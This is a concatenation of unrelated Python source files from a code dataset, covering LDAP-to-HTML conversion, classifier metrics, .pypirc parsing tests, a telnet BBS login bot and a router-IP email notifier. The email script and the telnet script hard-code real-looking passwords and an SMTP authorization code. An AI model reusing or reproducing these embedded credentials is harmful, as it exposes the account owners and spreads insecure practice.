# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# 1. The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Scope Class
# Used to allow for global and local variable separation.
class Scope(dict):
'''
A dict-like scoping object, resolving global and local variables.
It chiefly allows for global and local scope separation.
'''
def __init__(self, items=None, parent=None):
self.items = items or {}
self.parent = parent
def __repr__(self):
return "Scope(items={!r}, parent={!r})".format(self.items, self.parent)
def __str__(self):
return "Scope(items={!r}, parent={!r})".format(self.items, self.parent)
def __getitem__(self, key):
if key in self.items:
return self.items[key]
if self.parent:
return self.parent[key]
raise KeyError("no such variable in current scope")
def __setitem__(self, key, value):
if self.parent and key in self.parent:
self.parent[key] = value
else:
self.items[key] = value
def __contains__(self, key):
if key in self.items:
return True
if self.parent:
return key in self.parent
return False
def __len__(self):
size = len(self.items)
if self.parent:
size += len(self.parent)
return size
def __bool__(self):
return True
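# Minimal usage sketch (not part of the original module): a child scope reads
# through to its parent, assignment to an existing parent name writes through,
# and new names stay local.
if __name__ == "__main__":
    outer = Scope(items={"x": 1})
    inner = Scope(items={"y": 2}, parent=outer)
    assert inner["x"] == 1   # resolved from the parent scope
    inner["x"] = 10          # existing parent name: written through to outer
    assert outer["x"] == 10
    inner["z"] = 3           # new name: stored locally only
    assert "z" not in outer
    assert len(inner) == 3   # local items plus parent items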
| 30.918919 | 82 | 0.736451 |
4a1e3bcc14bbbfc5433c1012703fd242abc72cfe | 1,487 | py | Python | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | 4 | 2020-09-25T16:16:32.000Z | 2021-07-07T09:39:16.000Z | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | null | null | null | jobs/send_email_job.py | heavenbeing/stockleeks | e4b33d22a288d068db00770562d3b752fe4a6a58 | [
"Apache-2.0"
] | null | null | null | # smtplib 用于邮件的发信动作
import smtplib
import requests
from email.mime.text import MIMEText
# the email package is used to build the message content
from email.header import Header
# used to build the message header
# sender's information: the sending mailbox and its QQ Mail authorization code
from_addr = '[email protected]'
password = 'vxmovadvviffbgbj'
# recipient mailbox(es)
# to_addr = '[email protected],[email protected],[email protected]'
to_addr = '[email protected]'
# outgoing (SMTP) server
smtp_server = 'smtp.qq.com'
# message body: the first MIMEText argument is the content, the second the format ('plain' for plain text), the third the encoding
response = requests.get('http://ip.cip.cc')
print('ip address:')
print(response.text)
# /stock/data?table_name=guess_indicators_lite_buy_daily
# /stock/data?table_name=guess_indicators_lite_sell_daily
email_content = "Ip address:" + "heavenbeing.tpddns.cn\n" \
+ "stock address:" + "http://heavenbeing.tpddns.cn:8888/\n" \
+ "买入猜想(超买):" + "http://heavenbeing.tpddns.cn:8888/stock/data?table_name=guess_indicators_lite_buy_daily\n" \
+ "卖出猜想(超卖):" + "http://heavenbeing.tpddns.cn:8888/stock/data?table_name=guess_indicators_lite_sell_daily\n" \
+ " \r\n" \
+ " \r\nsend by python"
msg = MIMEText(email_content, 'plain', 'utf-8')
# message header fields
msg['From'] = Header(from_addr)
msg['To'] = Header(to_addr)
msg['Subject'] = Header('路由器动态ip')
# start the sending session; encrypted (SSL) transport is used here
server = smtplib.SMTP_SSL(smtp_server)
server.connect(smtp_server, 465)
# log in to the sending mailbox
server.login(from_addr, password)
# send the email
server.sendmail(from_addr, to_addr.split(','), msg.as_string())
# close the connection to the server
server.quit()
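# Side note (a sketch, not part of the original job): the same send could use a
# context manager so the connection is closed even if sendmail() raises:
#
#     with smtplib.SMTP_SSL(smtp_server, 465) as server:
#         server.login(from_addr, password)
#         server.sendmail(from_addr, to_addr.split(','), msg.as_string())
#
# It is left as a comment here so the script's behaviour is unchanged.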
| 29.156863 | 126 | 0.706792 |
4a1e3c5abfe94061b52c4e967ca044e6c2332e11 | 2,753 | py | Python | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | 4 | 2019-11-02T10:53:56.000Z | 2021-12-10T14:40:20.000Z | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | 1 | 2021-09-03T15:36:53.000Z | 2021-09-03T15:36:53.000Z | ldap2html/ldap2html/convert.py | nonylene/ldap2html | 99a0d012e50d1aaa96ebd0ae49240befe6bff858 | [
"MIT"
] | null | null | null | import ldap3
from operator import itemgetter
import itertools
from ..ldap.model import LdapHtmlText, LdapHtmlElement, LdapHtmlParticle, LdapHtmlFile, LdapHtmlVoidElement, ELEMENT_ATTR_DICT
from ..ldap import model as ldap_model
from ..ldap.utils import search
from ..html.model import HtmlElement, HtmlText, HtmlFile, HtmlVoidElement, HtmlNormalElement
filter_normal_element = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_NORMAL_ELEMENT})'
filter_void_element = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_VOID_ELEMENT})'
filter_text = f'(objectClass={ldap_model.OBJECT_CLASS_HTML_TEXT})'
def to_html_text(l_text: LdapHtmlText) -> HtmlText:
return HtmlText(l_text.htmlTextValue[0].decode())
def _to_html_element(l_element: LdapHtmlElement) -> HtmlElement:
# attributes
attrs = {}
for l_html_attr, html_attr in ELEMENT_ATTR_DICT.items():
values = getattr(l_element, l_html_attr)
if len(values) > 0:
attrs[html_attr] = values[0].decode()
return HtmlElement(
l_element.dn, l_element.htmlTagName[0].decode(), attrs
)
def to_html_void_element(l_element: LdapHtmlVoidElement) -> HtmlVoidElement:
element = _to_html_element(l_element)
return HtmlVoidElement(
element._id, element.tag_name, element.attributes
)
def _get_nth(particle: LdapHtmlParticle) -> int:
if len(particle.htmlNthChild) == 0:
return -1
return particle.htmlNthChild[0]
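# to_html_normal_element below materializes a container element recursively: it gathers
# the child text, void-element and normal-element entries from LDAP, then orders them by
# their htmlNthChild index (via _get_nth) so children keep their intended position.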
def to_html_normal_element(conn: ldap3.Connection, l_element: LdapHtmlElement) -> HtmlNormalElement:
# child texts
texts = (
(_get_nth(text), to_html_text(text)) for text in search(conn, l_element.dn, filter_text, LdapHtmlText)
)
# child void elements
void_elements = (
(_get_nth(elem), to_html_void_element(elem)) for elem in search(conn, l_element.dn, filter_void_element, LdapHtmlVoidElement)
)
# child normal elements
normal_elements = (
(_get_nth(elem), to_html_normal_element(conn, elem)) for elem in search(conn, l_element.dn, filter_normal_element, LdapHtmlElement)
)
    # sort particles by their nth-child index
sorted_elements = sorted(itertools.chain(texts, void_elements, normal_elements), key=itemgetter(0))
children = [index_elm[1] for index_elm in sorted_elements]
base_element = _to_html_element(l_element)
return HtmlNormalElement(
base_element._id, base_element.tag_name, base_element.attributes,
children
)
def to_html_file(conn: ldap3.Connection, l_html_file: LdapHtmlFile) -> HtmlFile:
top_l_html_element = next(search(conn, l_html_file.dn, filter_normal_element, LdapHtmlElement))
top_html_element = to_html_normal_element(conn, top_l_html_element)
return HtmlFile(l_html_file.o[0], top_html_element)
| 36.706667 | 139 | 0.748275 |
4a1e3c7eae557a2b14d00f775477270cfca2c27a | 522 | py | Python | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | 1 | 2020-09-08T21:21:29.000Z | 2020-09-08T21:21:29.000Z | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | 4 | 2021-03-18T21:08:11.000Z | 2021-09-08T00:16:23.000Z | shaneleblancnet/users/admin.py | shaneleblanc/portfolio-django | 9d3a0cebdc072f0536e1be39fa28fd71c1138fe1 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from shaneleblancnet.users.forms import UserChangeForm, UserCreationForm
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = (("User", {"fields": ("name",)}),) + auth_admin.UserAdmin.fieldsets
list_display = ["username", "name", "is_superuser"]
search_fields = ["name"]
| 29 | 83 | 0.750958 |
4a1e3db5df47115354cd0badb41806fa17246bbc | 2,161 | py | Python | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | Scripts/classifier_metrics.py | MathewTWilliams/News-Category-Classifiers | eddbc87919ff7de08ff5c42b05b5b35177ddb12e | [
"MIT"
] | null | null | null | #Author: Matt Williams
#Version: 12/08/2021
from sklearn.metrics import classification_report, hamming_loss, jaccard_score
from save_load_json import save_json
from utils import make_result_path
from numpy import NINF, PINF
from utils import get_result_path
from save_load_json import load_json
import os
def calculate_classifier_metrics(true_labels, predictions, model_details):
    '''Given the true_labels, the predictions of the classifier, and the classifier details,
calculate a classification report and save them to a json file along with
the model details.'''
model_details['Classification_Report'] = classification_report(true_labels, predictions, output_dict=True,
digits=4)
model_details['Hamming_Lose'] = hamming_loss(true_labels, predictions)
model_details['Jaccard_Score'] = jaccard_score(true_labels, predictions, average="macro")
model_details['Predictions'] = predictions.tolist()
file_path = make_result_path(model_details['Model'], model_details['Vector_Model'])
save_json(model_details, file_path)
def find_best_result(classifier_name, vec_model_name, metric, large = True):
'''Given the classifier name, the vector model used, and the name of the classifier metric,
    return the file name that contains the best value for that metric, along with the score itself.'''
best_score = NINF if large else PINF
best_file_name = ""
if not os.path.exists(get_result_path(classifier_name,"")):
return
for file in os.listdir(get_result_path(classifier_name,"")):
if file.startswith(vec_model_name):
results = load_json(get_result_path(classifier_name, file))['Classification_Report']
if metric not in results.keys():
return ""
if large and results[metric] > best_score:
best_file_name = file
best_score = results[metric]
elif not large and results[metric] < best_score:
best_file_name = file
best_score = results[metric]
return best_file_name, best_score
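# Illustrative usage sketch (variable values below are hypothetical, not part of this module):
#   calculate_classifier_metrics(y_true, y_pred, {"Model": "MLP", "Vector_Model": "tfidf"})
#   best_file, best_score = find_best_result("MLP", "tfidf", "accuracy")
# "accuracy" is one of the keys emitted by sklearn's classification_report(output_dict=True).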
| 43.22 | 111 | 0.701527 |
4a1e3dd16d61b3810a629f1fd8bfdf19b93ba52f | 4,563 | py | Python | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | null | null | null | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | 1 | 2019-10-24T16:57:02.000Z | 2019-10-28T15:03:43.000Z | tests/test_pypirc.py | bibby/pypi-uploader | 2adbe84542042d479618e5d6bc55a4453fda7d0a | [
"MIT"
] | 1 | 2018-12-19T18:35:51.000Z | 2018-12-19T18:35:51.000Z | """Tests for :mod:`pypiuploader.pypirc`."""
try:
import configparser
except ImportError:
import ConfigParser as configparser
import io
import tempfile
import types
import pytest
from pypiuploader import exceptions
from pypiuploader import pypirc
from . import utils
def test_read_config():
"""Test :class:`pypiuploader.pypirc.read_config`."""
tmpfile = utils._make_tmp_pypirc_file()
config = pypirc.read_config(tmpfile.name)
assert isinstance(config, configparser.ConfigParser)
sections = sorted(config.sections())
assert sections == ['distutils', 'external', 'internal', 'pypi']
class TestRCParser(object):
"""Tests for :class:`pypiuploader.pypirc.RCParser`."""
def test_from_file(self):
tmpfile = utils._make_tmp_pypirc_file()
parser = pypirc.RCParser.from_file(tmpfile.name)
assert isinstance(parser.config, configparser.ConfigParser)
sections = sorted(parser.config.sections())
assert sections == ['distutils', 'external', 'internal', 'pypi']
def test_from_file_when_pypirc_does_not_exist(self):
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.close()
with pytest.raises(exceptions.ConfigFileError) as exc:
pypirc.RCParser.from_file(tmpfile.name)
assert tmpfile.name in str(exc.value)
def test_read_index_servers(self):
parser = self._make_parser()
servers = parser._read_index_servers()
assert isinstance(servers, types.GeneratorType)
assert list(servers) == ['internal', 'external']
def test_read_index_servers_when_no_distutils_section(self):
parser = self._make_parser(b'')
servers = parser._read_index_servers()
assert isinstance(servers, types.GeneratorType)
assert list(servers) == []
def test_read_index_servers_when_no_index_servers(self):
parser = self._make_parser(b'[distutils]\n')
with pytest.raises(configparser.NoOptionError):
list(parser._read_index_servers())
def test_read_server_auth(self):
parser = self._make_parser()
auth = parser._read_server_auth('internal')
assert auth == ('bar', 'foo')
def test_read_server_auth_without_password(self):
parser = self._make_parser()
auth = parser._read_server_auth('external')
assert auth == ('baz', None)
def test_find_repo_config_not_found(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'foo')
assert repo_config is None
def test_find_repo_config_by_server_name(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'internal')
expected_config = {
'repository': 'http://127.0.0.1:8000',
'username': 'bar',
'password': 'foo',
}
assert repo_config == expected_config
def test_find_repo_config_by_repository(self):
parser = self._make_parser()
servers = ['internal', 'external']
repo_config = parser._find_repo_config(servers, 'https://foo.bar.com/')
expected_config = {
'repository': 'https://foo.bar.com/',
'username': 'baz',
'password': None,
}
assert repo_config == expected_config
def test_get_repository_config(self):
parser = self._make_parser()
repo_config = parser.get_repository_config('internal')
expected_config = {
'repository': 'http://127.0.0.1:8000',
'username': 'bar',
'password': 'foo',
}
assert repo_config == expected_config
def test_get_repository_config_when_no_distutils_section(self):
parser = self._make_parser(b'')
repo_config = parser.get_repository_config('internal')
assert repo_config is None
def test_get_repository_config_when_no_repository_section(self):
parser = self._make_parser(
b'[distutils]\n'
b'index-servers = internal'
)
with pytest.raises(configparser.NoSectionError):
parser.get_repository_config('internal')
def _make_parser(self, content=None):
if content is None:
content = utils.PYPIRC
config_buffer = io.StringIO(content.decode())
config = configparser.ConfigParser()
config.readfp(config_buffer)
parser = pypirc.RCParser(config)
return parser
| 31.6875 | 79 | 0.656147 |
4a1e3dd980592dc1142988e581b8b077dab317c7 | 2,641 | py | Python | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null | sweng/proto/stateexpect.py | AlwaysTraining/bbot | 0b907a426db89b9862b68e0af0894f4ee683ee2d | [
"MIT"
] | null | null | null |
import pexpect
import sys
import time
import os
switch_ip_address = "shenks.synchro.net"
print 'ip address is: ', switch_ip_address
t = pexpect.spawn('telnet ' + switch_ip_address,logfile=sys.stdout)
t.delaybeforesend=1
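# Each state advertises the pexpect patterns it is interested in (get_tokens) and maps the
# index of the matched pattern to the next state (parse_token); next_state() further down
# drives the telnet session by repeatedly expecting and transitioning until a state returns None.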
class state:
def __init__(self):
pass
def get_tokens(self):
return []
def parse_token(self,tok):
return self
class seedo(state):
def __init__(self, toks, response, nstate):
self.toks = toks
self.nstate = nstate
self.response = response
def get_tokens(self):
return self.toks
def parse_token(self,tok):
t.sendline(self.response)
return self.nstate
class pressenter(seedo):
def __init__(self, nextstate):
seedo.__init__(self,
['[Hit a key]','Enter number of bulletin to view or press (ENTER) to continue:'],
'\r',
nextstate)
class pressn(seedo):
def __init__(self, nextstate):
seedo.__init__(self,
['Search all groups for new messages?','Search all groups for un-read messages to you'],
'n',
nextstate)
class mmenu(state):
def get_tokens(self):
return ['...External programs','AFTERSHOCK:']
def parse_token(self,tok):
if tok == 0:
print 'i^&^&matched to:', tok, t.after
self.val = t.after[0]
return self
elif tok == 1:
print 'i^&^&sending ' , self.val
t.sendline(self.val+'\r')
# get access to text here
return None
class password(state):
def get_tokens(self):
return ['Password: ']
def parse_token(self,tok):
t.sendline('RANDYPAS\r')
return pressenter(pressenter(pressn(pressn(mmenu()))))
class username(state):
def get_tokens(self):
return ['Login: ']
def parse_token(self, which):
t.sendline('Randy32\r')
return password()
def next_state(t, curstate):
which_token = t.expect(curstate.get_tokens())
return curstate.parse_token(which_token)
state = username()
while state is not None:
state = next_state(t, state)
"""
t.expect('Login: ')
t.sendline('Randy32\r')
t.expect('Password: ')
t.sendline('RANDYPAS\r')
t.expect_exact('[Hit a key]')
t.sendline('\r')
t.expect_exact('Enter number of bulletin to view or press (ENTER) to continue:')
t.sendline('\r')
t.expect_exact('Search all groups for new messages?')
t.sendline('n')
t.expect_exact('Search all groups for un-read messages to you')
t.sendline('n')
t.expect('AFTERSHOCK:')
t.sendline('\/o')
"""
t.expect('zzzzzzsads232e1fd2312')
| 22.767241 | 104 | 0.615297 |
4a1e3dea150468b22591d06c8acfc694868cede1 | 512 | py | Python | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | null | null | null | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | 1 | 2015-04-12T20:17:46.000Z | 2015-04-12T20:17:46.000Z | alienspoilers/subs/migrations/0009_auto_20150223_2311.py | astonshane/Alien-Spoilers | a84c2eff921bc260f192085129c6891d38594926 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('subs', '0008_auto_20150223_2218'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='user',
field=models.OneToOneField(related_name='profile', to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
]
| 23.272727 | 92 | 0.638672 |
4a1e3e429be6cd06ca0680362f2ddc546e70e4a9 | 6,254 | py | Python | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | library/oneview_server_profile_template_facts.py | soodpr/oneview-ansible | f4f07062eda3f6dc17f4c306f376ddebb7313fbb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: oneview_server_profile_template_facts
short_description: Retrieve facts about the Server Profile Templates from OneView.
description:
- Retrieve facts about the Server Profile Templates from OneView.
version_added: "2.3"
requirements:
- "python >= 2.7.9"
- "hpOneView >= 5.0.0"
author: "Bruno Souza (@bsouza)"
options:
name:
description:
- Server Profile Template name.
uri:
description:
- Server Profile Template uri.
options:
description:
- "List with options to gather additional facts about Server Profile Template resources.
Options allowed: C(new_profile), C(transformation) and C(available_networks)."
notes:
- The option C(transformation) is only available for API version 300 or later.
- The option C(available_networks) is only available for API version 600 or later.
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
- name: Gather facts about all Server Profile Templates
oneview_server_profile_template_facts:
config: "{{ config }}"
- debug: var=server_profile_templates
- name: Gather paginated, filtered and sorted facts about Server Profile Templates
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
params:
start: 0
count: 3
sort: name:ascending
filter: macType='Virtual'
scope_uris: /rest/scopes/af62ae65-06b2-4aaf-94d3-6a92562888cf
delegate_to: localhost
- debug: var=server_profile_templates
- name: Gather facts about a Server Profile Template by name
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
name: "ProfileTemplate101"
- name: Gather facts about a Server Profile by uri
oneview_server_profile_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
uri: /rest/server-profile-templates/c0868397-eff6-49ed-8151-4338702792d3
delegate_to: localhost
- name: Gather facts about a template and a profile with the configuration based on this template
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
name: "ProfileTemplate101"
options:
- new_profile
- name: Gather facts about available networks.
oneview_server_profile_template_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1200
options:
- available_networks:
serverHardwareTypeUri: "/rest/server-hardware-types/253F1D49-0FEE-4DCD-B14C-B26234E9D414"
enclosureGroupUri: "/rest/enclosure-groups/293e8efe-c6b1-4783-bf88-2d35a8e49071"
delegate_to: localhost
'''
RETURN = '''
server_profile_templates:
description: Has all the OneView facts about the Server Profile Templates.
returned: Always, but can be null.
type: dict
new_profile:
description: A profile object with the configuration based on this template.
returned: When requested, but can be null.
type: dict
server_profile_template_available_networks:
description: Has all the facts about the list of Ethernet networks, Fibre Channel networks and network sets that
are available to the server profile along with their respective ports.
returned: When requested, but can be null.
type: dict
'''
from ansible.module_utils.oneview import OneViewModule
class ServerProfileTemplateFactsModule(OneViewModule):
argument_spec = dict(
name=dict(type='str'),
options=dict(type='list'),
params=dict(type='dict'),
uri=dict(type='str')
)
def __init__(self):
super(ServerProfileTemplateFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.set_resource_object(self.oneview_client.server_profile_templates)
def execute_module(self):
name = self.module.params.get("name")
uri = self.module.params.get("uri")
if name or uri:
facts = self.__get_options(name, uri)
elif self.options and self.options.get("available_networks"):
network_params = self.options["available_networks"]
facts = {"server_profile_template_available_networks": self.resource_client.get_available_networks(**network_params)}
else:
facts = self.__get_all()
return dict(changed=False, ansible_facts=facts)
def __get_options(self, name, uri):
if not self.current_resource:
return dict(server_profile_templates=[])
facts = dict(server_profile_templates=[self.current_resource.data])
if self.options:
if "new_profile" in self.options:
facts["new_profile"] = self.current_resource.get_new_profile()
if "transformation" in self.options:
tranformation_data = self.options.get('transformation')
facts["transformation"] = self.current_resource.get_transformation(**tranformation_data)
return facts
def __get_all(self):
templates = self.resource_client.get_all(**self.facts_params)
return dict(server_profile_templates=templates)
def main():
ServerProfileTemplateFactsModule().run()
if __name__ == '__main__':
main()
| 32.572917 | 129 | 0.712504 |
4a1e3e995f0b2f8cac292df77867cb37ac4ac1f7 | 6,596 | py | Python | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 11,750 | 2015-10-12T07:03:39.000Z | 2022-03-31T20:43:15.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,951 | 2015-10-12T00:41:25.000Z | 2022-03-31T22:19:26.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/carpet/aaxis/_title.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,623 | 2015-10-15T14:40:27.000Z | 2022-03-28T16:05:50.000Z | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "carpet.aaxis"
_path_str = "carpet.aaxis.title"
_valid_props = {"font", "offset", "text"}
# font
# ----
@property
def font(self):
"""
Sets this axis' title font. Note that the title's font used to
be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.carpet.aaxis.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.carpet.aaxis.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# offset
# ------
@property
def offset(self):
"""
An additional amount by which to offset the title from the tick
labels, given in pixels. Note that this used to be set by the
now deprecated `titleoffset` attribute.
The 'offset' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["offset"]
@offset.setter
def offset(self, val):
self["offset"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of this axis. Note that before the existence of
`title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this axis' title font. Note that the title's font
used to be set by the now deprecated `titlefont`
attribute.
offset
An additional amount by which to offset the title from
the tick labels, given in pixels. Note that this used
to be set by the now deprecated `titleoffset`
attribute.
text
Sets the title of this axis. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, offset=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.carpet.aaxis.Title`
font
Sets this axis' title font. Note that the title's font
used to be set by the now deprecated `titlefont`
attribute.
offset
An additional amount by which to offset the title from
the tick labels, given in pixels. Note that this used
to be set by the now deprecated `titleoffset`
attribute.
text
Sets the title of this axis. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.carpet.aaxis.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.carpet.aaxis.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("offset", None)
_v = offset if offset is not None else _v
if _v is not None:
self["offset"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 32.333333 | 82 | 0.535476 |
4a1e4094a0880d8af24f95f088063e362ebbed08 | 24,507 | py | Python | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | omg/lump.py | Xymph/omgifol | 0c8001dae2bff00824ecd49343ba9ae21066e2b2 | [
"MIT"
] | null | null | null | # Import the Python Imaging Library if it is available. On error, ignore
# the problem and continue. PIL being absent should only affect the
# graphic lump loading/saving methods and the user may not be interested
# in installing PIL just to pass this line if not interested in using the
# graphics functionality at all.
try:
from PIL import Image, ImageDraw, ImageOps
except:
pass
# Import PySoundFile for sound file loading/saving. Equally optional.
try:
from soundfile import SoundFile, check_format
import numpy as np
except:
pass
import os
import omg.palette
from omg.util import *
class Lump(object):
"""Basic lump class. Instances of Lump (and its subclasses)
always have the following:
.data -- a bytes object holding the lump's data
.from_file -- load the data to a file
.to_file -- save the data to a file
The default Lump class merely copies the raw data when
loading/saving to files, but subclasses may convert data
appropriately (for example, Graphic supports various image
formats)."""
def __init__(self, data=None, from_file=None):
"""Create a new instance. The `data` parameter may be a string
        representing data for the lump. The `from_file` parameter may be
a path to a file or a file-like object to load from."""
self.data = bytes()
if issubclass(type(data), Lump):
self.data = data.data
elif data is not None:
self.data = data or bytes()
if from_file:
self.from_file(from_file)
def from_file(self, source):
"""Load data from a file. Source may be a path name string
or a file-like object (with a `write` method)."""
self.data = readfile(source)
def to_file(self, target):
